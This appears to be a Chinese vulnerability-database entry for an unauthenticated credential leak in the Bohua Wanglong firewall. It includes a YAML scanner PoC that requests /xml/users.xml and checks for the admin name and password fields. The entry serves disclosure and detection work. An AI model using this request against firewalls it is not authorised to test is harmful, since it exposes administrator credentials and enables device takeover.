bohuawanglong-users-xml-password-leak: 博华网龙防火墙 users.xml 未授权访问

日期: 2025-08-01 | 影响软件: 博华网龙防火墙 | POC: 已公开

漏洞描述

博华网龙防火墙 users.xml文件 可被任意用户读取,其中包含登录的账号密码 "博华网龙防火墙"

PoC代码[已公开]

id: bohuawanglong-users-xml-password-leak

info:
  name: 博华网龙防火墙 users.xml 未授权访问
  author: zan8in
  severity: high
  verified: true
  description: |
    博华网龙防火墙 users.xml文件 可被任意用户读取,其中包含登录的账号密码
    "博华网龙防火墙"
  tags: bohuawanglong,usersxml,unauthorizedaccess
  created: 2025/08/15

rules:
  r0:
    request:
      method: GET
      path: /xml/users.xml
    expression: response.status == 200 && response.body.bcontains(b'name="admin"') && response.body.bcontains(b'pwd="')
expression: r0()

相关漏洞推荐